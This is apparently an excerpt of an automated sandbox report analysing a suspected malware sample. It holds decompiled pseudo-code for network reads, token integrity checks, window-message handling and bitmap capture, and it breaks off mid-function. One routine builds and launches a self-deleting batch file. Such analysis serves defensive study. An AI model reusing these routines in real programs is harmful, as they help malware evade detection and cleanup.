    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Object
    • String ID:
    • API String ID: 2936123098-0
    • Opcode ID: d5146b9f2a59098d48abf0b6af36c6dee85252e12a276f1cb1332570ab8191a1
    • Instruction ID: d1cc0550cc51ce5b967662fa22dd02b769cc4d0b11de5ce1d3c3fdd99bd680b0
    • Opcode Fuzzy Hash: d5146b9f2a59098d48abf0b6af36c6dee85252e12a276f1cb1332570ab8191a1
    • Instruction Fuzzy Hash: B051E675950219ABDB24DFA8DC81AFEBBF4FF48390F004529E556E7240E7319A45CB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E012D1B0D(intOrPtr __ecx, void* __edx, void* __eflags, signed int* _a4, signed int* _a8) {
    				signed int _v8;
    				signed int _v9;
    				signed int _v16;
    				intOrPtr _v20;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v60;
    				intOrPtr _v64;
    				void* _v68;
    				signed int _t42;
    				char* _t47;
    				void* _t83;
    
    				_v68 = __edx;
    				_v64 = __ecx;
    				ResetEvent(_v68);
    				_t42 = L012B1C17(0x1000);
    				_v16 = _t42;
    				if(_v16 != 0) {
    					_v20 = 4;
    					__imp__InternetSetStatusCallbackW(_v64, E012D1C95);
    					_v8 = _t42;
    					 *_a4 =  *_a4 & 0x00000000;
    					 *_a8 =  *_a8 & 0x00000000;
    					_v9 = 1;
    					_t83 = 0x28;
    					L012B19F6( &_v60, _t83);
    					_v60 = 0x28;
    					_v40 = _v16;
    					while(1) {
    						L3:
    						_v36 = 0x1000;
    						_t47 =  &_v60;
    						__imp__InternetReadFileExA(_v64, _t47, 8, 0);
    						if(_t47 == 0) {
    							break;
    						}
    						if(_v36 != 0) {
    							if((L012B1C26(_a4,  *_a8 + _v36) & 0x000000ff) != 0) {
    								L012B1947( *_a4 +  *_a8, _v16, _v36);
    								 *_a8 =  *_a8 + _v36;
    								continue;
    							}
    							_v9 = 0;
    							L12:
    							asm("sbb eax, eax");
    							__imp__InternetSetStatusCallbackW(_v64,  ~(_v8 + 1) & _v8);
    							L012B1933(_v16);
    							if((_v9 & 0x000000ff) == 0) {
    								L012B1933( *_a4);
    							}
    							return _v9;
    						}
    						goto L12;
    					}
    					if(GetLastError() != 0x3e5) {
    						_v9 = 0;
    						goto L12;
    					}
    					L012B1334(1,  &_v68, 0, 0xffffffff);
    					goto L3;
    				}
    				L012B1933(_v16);
    				return 0;
    			}
















    APIs
    • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,012D18A0,00000000), ref: 012D1B1C
    • InternetSetStatusCallbackW.WININET(?,012D1C95), ref: 012D1B53
    • InternetReadFileExA.WININET(?,00000028,00000008,00000000), ref: 012D1B96
    • GetLastError.KERNEL32 ref: 012D1BA0
    • InternetSetStatusCallbackW.WININET(?,000000FF), ref: 012D1C20
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Internet$CallbackStatus$ErrorEventFileLastReadReset
    • String ID: (
    • API String ID: 2159071600-3887548279
    • Opcode ID: b1a579bdeda5245b26e3a9fa5f462e641fe96378db376064f05a551ee35c7750
    • Instruction ID: af332d2d771e210303137badff14820dfedd575a2fe51bf4edeba6436ecf1c39
    • Opcode Fuzzy Hash: b1a579bdeda5245b26e3a9fa5f462e641fe96378db376064f05a551ee35c7750
    • Instruction Fuzzy Hash: 7A415B30D24249EFDF15DFA4E885BECBBB1FF19354F008055E811AB290EBB49A61CB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E012BE328(void* __ebx, void* __ecx) {
    				char _v8;
    				short _v28;
    				intOrPtr _v32;
    				char _v76;
    				short _v596;
    				char _v856;
    				char _v1396;
    				void* _t32;
    				char _t57;
    				void* _t59;
    
    				_t59 = __ecx;
    				if(L012B1546(0, L"bat",  &_v596) == 0) {
    					L7:
    					return 0;
    				}
    				CharToOemW( &_v596,  &_v856);
    				_push( &_v856);
    				if(L012B128F( &_v8, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _t59) == 0xffffffff) {
    					L6:
    					L012B1640( &_v596);
    					goto L7;
    				}
    				_t32 = L012B14A1( &_v596, _v8, _t30);
    				L012B1933(_v8);
    				if(_t32 == 0 || L012B1A8C( &_v1396, 0x10e, L"/c \"%s\"",  &_v596) <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v596, 0x104) - 1 > 0x102) {
    					goto L6;
    				} else {
    					_t57 = 0x44;
    					L012B15F5( &_v76,  &_v76, 0, _t57);
    					_v28 = 0;
    					_v76 = _t57;
    					_v32 = 1;
    					return L012B166D( &_v596,  &_v1396, 0,  &_v76, 0) & 0xffffff00 | _t44 != 0x00000000;
    				}
    			}














    APIs
    • CharToOemW.USER32 ref: 012BE35D
    • GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104), ref: 012BE3DE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CharEnvironmentVariable
    • String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
    • API String ID: 2361153823-3344086482
    • Opcode ID: 08494b14b557b3fc42d746360c5fcb4ae03cfd99033617b0471de59fc019ff3c
    • Instruction ID: 3078d5910d0584a46078bf887f43694cad2049b9dca1c5e2585b9ebcd4e9f0ba
    • Opcode Fuzzy Hash: 08494b14b557b3fc42d746360c5fcb4ae03cfd99033617b0471de59fc019ff3c
    • Instruction Fuzzy Hash: 8B21B772C20119AADB10EAB4ECC5EFF73BDEF55345F044195E905E3184E6789B898B50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E012B4F2A(void* __ecx) {
    				long _v8;
    				void* _v12;
    				char* _t20;
    				signed char _t21;
    				DWORD* _t24;
    				void* _t33;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t27 = 0;
    				if(OpenProcessToken(__ecx, 8,  &_v12) == 0) {
    					L14:
    					return _t27;
    				}
    				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
    					L13:
    					CloseHandle(_v12);
    					goto L14;
    				} else {
    					_t33 = L012B1C17(_v8);
    					if(_t33 == 0) {
    						L12:
    						goto L13;
    					}
    					if(GetTokenInformation(_v12, 0x19, _t33, _v8,  &_v8) != 0) {
    						_t20 = GetSidSubAuthorityCount( *_t33);
    						if(_t20 != 0) {
    							_t21 =  *_t20;
    							if(_t21 > 0) {
    								_t24 = GetSidSubAuthority( *_t33, (_t21 & 0x000000ff) - 1);
    								if(_t24 != 0) {
    									if( *_t24 >= 0x2000) {
    										asm("sbb bl, bl");
    										_t27 = 3;
    									} else {
    										_t27 = 1;
    									}
    								}
    							}
    						}
    					}
    					L012B1933(_t33);
    					goto L12;
    				}
    			}










    APIs
    • OpenProcessToken.ADVAPI32(?,00000008,?), ref: 012B4F39
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,00000008,?), ref: 012B4F59
    • GetLastError.KERNEL32(?,?,00000008,?), ref: 012B4F5F
    • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,?,?,00000008,?), ref: 012B4F86
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00000008,?), ref: 012B4F8E
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00000008,?), ref: 012B4FA5
    • CloseHandle.KERNEL32(?,?,?,00000008,?), ref: 012B4FD1
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
    • String ID:
    • API String ID: 3714493844-0
    • Opcode ID: be670e431fdb3c5fd21fc814f16b2e2858fc9a3efb318223f6af91bada3b1359
    • Instruction ID: f5a9e786ffc657fa1221bbaa511b6d282af5dcd3b1b37f82270281461d71edf1
    • Opcode Fuzzy Hash: be670e431fdb3c5fd21fc814f16b2e2858fc9a3efb318223f6af91bada3b1359
    • Instruction Fuzzy Hash: F611813266104ABFFB21AA98DCC8EFE7F6EEB05380F140465F602DB052D7219E559721
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E012B8060(signed char __ecx) {
    				signed char _v8;
    				struct tagLOGFONTW _v100;
    				signed int _t15;
    				struct HDC__* _t23;
    
    				_v8 = __ecx;
    				_t23 = GetDC(0);
    				_t15 = MulDiv(_v8 & 0x000000ff, GetDeviceCaps(_t23, 0x5a), 0x48);
    				ReleaseDC(0, _t23);
    				_v100.lfHeight =  ~_t15;
    				_v100.lfWidth = 0;
    				_v100.lfEscapement = 0;
    				_v100.lfOrientation = 0;
    				_v100.lfWeight = 0x190;
    				_v100.lfItalic = 0x1000000;
    				_v100.lfOutPrecision = 0;
    				L012B1947( &(_v100.lfFaceName), "MS Shell Dlg 2", 0xf);
    				return CreateFontIndirectW( &_v100);
    			}








    APIs
    • GetDC.USER32(00000000), ref: 012B806F
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 012B807C
    • MulDiv.KERNEL32(?,00000000), ref: 012B8088
    • ReleaseDC.USER32 ref: 012B8094
    • CreateFontIndirectW.GDI32(?), ref: 012B80CB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CapsCreateDeviceFontIndirectRelease
    • String ID: MS Shell Dlg 2
    • API String ID: 3808545654-3198668166
    • Opcode ID: acdc5daa8c6d81993b54b5d26b30add7e4f8842f3258ca2c1870f5d6f7e0bd58
    • Instruction ID: ba82cb8aafa68550a37cca786e5d42e42c4b5be30060b9e1f0e2091c64726c75
    • Opcode Fuzzy Hash: acdc5daa8c6d81993b54b5d26b30add7e4f8842f3258ca2c1870f5d6f7e0bd58
    • Instruction Fuzzy Hash: 2C012CB1D01358AFDB209FE5EC89AAEBFBCBB09751F440029F206EB144D77449058B60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E012CD271(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
    				long _v8;
    				void* __ebx;
    				void* __esi;
    				int _t46;
    				signed int _t47;
    				signed short _t57;
    				int _t64;
    				signed int _t65;
    				signed short _t75;
    				void* _t79;
    
    				_t69 = __ecx;
    				_push(__ecx);
    				_t75 = _a16;
    				_t79 = __eax;
    				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
    					_t64 = GetAncestor(_a4, 2);
    					if(_t64 ==  *(_t79 + 0x170)) {
    						goto L8;
    					}
    					_t69 = _a12 & 0x0000ffff;
    					_t47 = SendMessageTimeoutW(_a4, 0x21, _t64, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
    					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
    						 *(_t79 + 0x170) = _t64;
    						goto L8;
    					} else {
    						goto L35;
    					}
    				} else {
    					L8:
    					_t65 = _a12 & 0x0000ffff;
    					_v8 = _t65;
    					_t46 = PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t65);
    					if(_a12 != 1) {
    						_t47 = E012CD192(_t69, _t79, _a4, _a20);
    						_a20 = _t47;
    						__eflags = _t65 - 8;
    						if(__eflags > 0) {
    							__eflags = _t65 - 9;
    							if(__eflags == 0) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									__eflags = _t47 - 0xa5;
    									if(_t47 != 0xa5) {
    										L35:
    										return _t47;
    									}
    									_t47 = 0xffff;
    									L59:
    									__eflags = _t47;
    									if(_t47 == 0) {
    										goto L35;
    									}
    									__eflags = _t47 - 0xffff;
    									if(_t47 != 0xffff) {
    										L33:
    										_push(_a28);
    										_push(_t47 & 0x0000ffff);
    										_push(0x112);
    										L34:
    										_t47 = PostMessageW(_a4, ??, ??, ??);
    										goto L35;
    									}
    									L61:
    									_push(_a28);
    									_push(_a4);
    									_push(0x7b);
    									goto L34;
    								}
    								_t47 =  *(_a8 + 0x24);
    								__eflags = _t47 & 0x00010000;
    								if((_t47 & 0x00010000) == 0) {
    									goto L35;
    								}
    								asm("sbb eax, eax");
    								_t47 = ( ~(_t47 & 0x01000000) & 0x000000f0) + 0x0000f030 & 0x0000ffff;
    								goto L59;
    							}
    							if(__eflags <= 0) {
    								L25:
    								_push(_a28);
    								_push(_t65);
    								L10:
    								_push(_t47);
    								goto L34;
    							}
    							__eflags = _t65 - 0x11;
    							if(_t65 <= 0x11) {
    								L40:
    								__eflags = _t47 - 0xa1;
    								if(_t47 == 0xa1) {
    									_t47 = E012CD002(_a4, _t79, GetWindowThreadProcessId(_a4, 0), _a12, 1);
    								}
    								goto L35;
    							}
    							__eflags = _t65 - 0x14;
    							if(_t65 == 0x14) {
    								__eflags = _t47 - 0xa2;
    								if(_t47 != 0xa2) {
    									L21:
    									__eflags = _t47 - 0xa5;
    									L22:
    									if(__eflags != 0) {
    										goto L35;
    									}
    									goto L61;
    								}
    								L32:
    								_t47 = 0xf060;
    								goto L33;
    							}
    							__eflags = _t65 - 0x15;
    							if(_t65 != 0x15) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = 0xf180;
    							goto L33;
    						}
    						if(__eflags == 0) {
    							__eflags = _t47 - 0xa2;
    							if(_t47 != 0xa2) {
    								goto L21;
    							}
    							_t47 = _a8;
    							__eflags =  *(_t47 + 0x24) & 0x00020000;
    							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
    								goto L35;
    							}
    							_t47 = 0xf020;
    							goto L33;
    						}
    						__eflags = _t65 - 2;
    						if(_t65 == 2) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 == 0xa3) {
    								goto L25;
    							}
    							__eflags = _t47 - 0xa5;
    							if(_t47 == 0xa5) {
    								goto L61;
    							}
    							goto L40;
    						}
    						__eflags = _t65 - 3;
    						if(_t65 == 3) {
    							__eflags = _t47 - 0xa3;
    							if(_t47 != 0xa3) {
    								__eflags = _t47 - 0xa5;
    								if(_t47 == 0xa5) {
    									goto L61;
    								}
    								__eflags = _t47 - 0xa1;
    								goto L22;
    							}
    							goto L32;
    						}
    						__eflags = _t65 - 5;
    						if(_t65 == 5) {
    							__eflags = _t47 - 0xa1;
    							if(_t47 != 0xa1) {
    								__eflags = _t47 - 0xa0;
    								if(_t47 != 0xa0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0xfffffffe);
    								L28:
    								_push( *((intOrPtr*)(_t79 + 8)));
    								goto L34;
    							}
    							_push(0);
    							_push(0xffffffff);
    							goto L28;
    						}
    						__eflags = _t65 - 6 - 1;
    						if(_t65 - 6 > 1) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa1;
    						if(_t47 == 0xa1) {
    							E012CD002(_a4, _t79, GetWindowThreadProcessId(_a4, 0), 0, 1);
    							_t47 = _a20;
    							_t65 = _v8;
    							goto L25;
    						}
    						__eflags = _t47 - 0xa2;
    						if(_t47 == 0xa2) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa3;
    						if(_t47 == 0xa3) {
    							goto L25;
    						}
    						__eflags = _t47 - 0xa0;
    						if(_t47 == 0xa0) {
    							goto L25;
    						}
    						goto L21;
    					}
    					_t57 = L012B167C(_t46, _t79, 0, 0);
    					_push(_a24);
    					_push(_t57 & 0x0000ffff);
    					_t47 = E012CD192(_t79, _t79, _a4, _a16);
    					goto L10;
    				}
    			}














    APIs
    • GetAncestor.USER32(?,00000002), ref: 012CD29A
    • SendMessageTimeoutW.USER32 ref: 012CD2C5
    • PostMessageW.USER32(?,00000020,?,00000000), ref: 012CD307
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 012CD39D
    • PostMessageW.USER32(?,00000112,?,?), ref: 012CD3F0
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 012CD42F
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
    • String ID:
    • API String ID: 1223205383-0
    • Opcode ID: db1cb4f56371dc3e907e8ae506a7afe2a246b220bc8ff5e343cfbd494ed21a71
    • Instruction ID: e42b07c5a43cd1ad20fe1495edf514c01e22dc3410151ff5f47252fa8787340a
    • Opcode Fuzzy Hash: db1cb4f56371dc3e907e8ae506a7afe2a246b220bc8ff5e343cfbd494ed21a71
    • Instruction Fuzzy Hash: BC519C3062025EEAFF315B9CCC89BBE3A65EB05B50F14063AFB45D7091C276D4819AE2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E012D17DE(intOrPtr* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
    				signed int _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				char _v20;
    				signed int _v21;
    				char _v28;
    				void* _v32;
    				char _v36;
    				intOrPtr _v40;
    				char* _v44;
    				struct _GOPHER_FIND_DATAA _v48;
    				long _v52;
    				signed int _v56;
    				intOrPtr* _v60;
    				signed int _v64;
    				intOrPtr _t125;
    				signed int _t128;
    				signed int _t137;
    				signed char _t160;
    				signed int _t170;
    				struct _GOPHER_FIND_DATAA _t172;
    				struct _GOPHER_FIND_DATAA _t173;
    				signed int* _t178;
    				void* _t208;
    
    				_v64 = __edx;
    				_v60 = __ecx;
    				_v8 = _v8 | 0xffffffff;
    				EnterCriticalSection(0x12dda14);
    				_v12 = E012D104F( *_v60);
    				if(_v12 == 0xffffffff ||  *((intOrPtr*)( *0x12dda2c + 0x10 + _v12 * 0x24)) <= 0) {
    					L34:
    					LeaveCriticalSection(0x12dda14);
    					return _v8;
    				} else {
    					_v16 = _v12 * 0x24 +  *0x12dda2c;
    					if((L012B11BD( *((intOrPtr*)(_v16 + 0xc)),  *((intOrPtr*)(_v16 + 0x10))) & 0x000000ff) == 0) {
    						__eflags = _a8;
    						if(_a8 != 0) {
    							_t178 = _a8;
    							 *_t178 =  *_t178 & 0x00000000;
    							__eflags =  *_t178;
    						}
    						__eflags =  *((intOrPtr*)(_v16 + 0x18)) - 0xffffffff;
    						if(__eflags != 0) {
    							L22:
    							_t125 = _v16;
    							__eflags =  *((intOrPtr*)(_t125 + 0x18)) - 0xffffffff;
    							if( *((intOrPtr*)(_t125 + 0x18)) != 0xffffffff) {
    								__eflags = _v8 - 0xffffffff;
    								if(_v8 == 0xffffffff) {
    									_t128 =  *((intOrPtr*)(_v16 + 0x18)) -  *(_v16 + 0x1c);
    									__eflags = _t128;
    									_v56 = _t128;
    									if(_t128 != 0) {
    										__eflags = _v64;
    										if(_v64 == 0) {
    											_a4 = L012B1AEB(0x1000, 0x2000);
    										}
    										__eflags = _a4 - _v56;
    										if(_a4 < _v56) {
    											_v56 = _a4;
    										}
    										__eflags = _v64;
    										if(_v64 != 0) {
    											L012B1947(_v64,  *((intOrPtr*)(_v16 + 0x14)) +  *(_v16 + 0x1c), _v56);
    											_t137 =  *(_v16 + 0x1c) + _v56;
    											__eflags = _t137;
    											 *(_v16 + 0x1c) = _t137;
    										}
    									}
    									__eflags = _a8;
    									if(_a8 != 0) {
    										 *_a8 = _v56;
    									}
    									_v8 = 1;
    								}
    							}
    							goto L34;
    						}
    						_v32 =  *((intOrPtr*)(_v16 + 4));
    						LeaveCriticalSection(0x12dda14);
    						_v21 = E012D1B0D( *_v60, _v32, __eflags,  &_v20,  &_v28);
    						EnterCriticalSection(0x12dda14);
    						__eflags = _v21 & 0x000000ff;
    						if((_v21 & 0x000000ff) == 0) {
    							L9:
    							__eflags = _v21 & 0x000000ff;
    							if((_v21 & 0x000000ff) != 0) {
    								L012B1933(_v20);
    							}
    							_v8 = _v8 & 0x00000000;
    							SetLastError(0x2ee4);
    							goto L22;
    						}
    						_v12 = E012D104F( *_v60);
    						__eflags = _v12 - 0xffffffff;
    						if(_v12 != 0xffffffff) {
    							_v16 = _v12 * 0x24 +  *0x12dda2c;
    							_push( &_v36);
    							_t208 = 0x22;
    							_v40 = L012B10F0( *_v60, _t208);
    							_push( *((intOrPtr*)(_v16 + 0x10)));
    							_push( *((intOrPtr*)(_v16 + 0xc)));
    							_push( &_v28);
    							_t160 = L012B17EE(_v40,  &_v20);
    							__eflags = _t160 & 0x000000ff;
    							if((_t160 & 0x000000ff) != 0) {
    								_v44 = L012B1596(_v40, _v36);
    								__eflags = _v44;
    								if(_v44 != 0) {
    									_v52 = 0x1000;
    									_v48 = L012B1C17(_v52);
    									__eflags = _v48;
    									if(_v48 != 0) {
    										 *_v48 = 0x50;
    										_t170 = GetUrlCacheEntryInfoW(_v44, _v48,  &_v52);
    										__eflags = _t170;
    										if(_t170 != 0) {
    											_t172 = _v48;
    											__eflags =  *(_t172 + 8);
    											if( *(_t172 + 8) != 0) {
    												_t173 = _v48;
    												__eflags =  *( *(_t173 + 8)) & 0x0000ffff;
    												if(( *( *(_t173 + 8)) & 0x0000ffff) != 0) {
    													L012B14A1( *((intOrPtr*)(_v48 + 8)), _v20, _v28);
    												}
    											}
    										}
    										L012B1933(_v48);
    									}
    									L012B1933(_v44);
    								}
    							}
    							L012B1933(_v40);
    							 *((intOrPtr*)(_v16 + 0x14)) = _v20;
    							 *((intOrPtr*)(_v16 + 0x18)) = _v28;
    							goto L22;
    						}
    						goto L9;
    					} else {
    						 *_v60 =  *((intOrPtr*)(_v16 + 0x20));
    						goto L34;
    					}
    				}
    			}




























    APIs
    • EnterCriticalSection.KERNEL32(012DDA14), ref: 012D17F3
    • LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D1885
    • EnterCriticalSection.KERNEL32(012DDA14,00000000,000000FF), ref: 012D18A8
    • SetLastError.KERNEL32(00002EE4), ref: 012D18E2
    • LeaveCriticalSection.KERNEL32(012DDA14), ref: 012D1A5D
    Memory Dump Source
    • Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true
    • Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd
    Similarity
    • API ID: CriticalSection$EnterLeave$ErrorLast
    • String ID:
    • API String ID: 486337731-0
    • Opcode ID: d38e5544bb71a263c0c3f95d11c140cd1d6c88bea87ee3995192922aa0ab4aea
    • Instruction ID: cadde5b6aa6901988c5df40d69cfb0a050a0ae3d04ab88e4502e3982f4a9b190
    • Opcode Fuzzy Hash: d38e5544bb71a263c0c3f95d11c140cd1d6c88bea87ee3995192922aa0ab4aea
    • Instruction Fuzzy Hash: F291D774E1020AEFDB14DFA9D494AEDBBB1FF48310F148159E921AB290D730AA55CF51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E012BA2E7(struct HDC__* __ecx, int __edx, void* _a4, BITMAPINFO** _a8, void** _a12, void* _a16, long _a20) {
    				struct HDC__* _v8;
    				int _v12;
    				struct HBITMAP__* _t30;
    				void* _t40;
    				long _t41;
    				struct HBITMAP__* _t49;
    				void* _t50;
    				signed int _t61;
    				signed int _t62;
    				BITMAPINFO** _t67;
    				BITMAPINFO* _t69;
    
    				_t62 = __edx;
    				_push(__ecx);
    				_push(__ecx);
    				_v8 = __ecx;
    				_v12 = 0;
    				_t30 = CreateCompatibleBitmap(__ecx, __edx, _a4);
    				_a4 = _t30;
    				if(_t30 == 0) {
    					L18:
    					return _v12;
    				}
    				_t69 = L012B1C17(0x428);
    				if(_t69 == 0) {
    					L15:
    					if(_a4 != 0) {
    						DeleteObject(_a4);
    					}
    					L17:
    					goto L18;
    				}
    				_t69->bmiHeader = 0x28;
    				if(GetDIBits(_v8, _a4, 0, 1, 0, _t69, 0) == 0 || GetDIBits(_v8, _a4, 0, 1, 0, _t69, 0) == 0) {
    					L14:
    					L012B1933(_t69);
    					goto L15;
    				} else {
    					DeleteObject(_a4);
    					asm("cdq");
    					_t61 =  ~((_t69->bmiHeader.biHeight ^ __edx) - __edx);
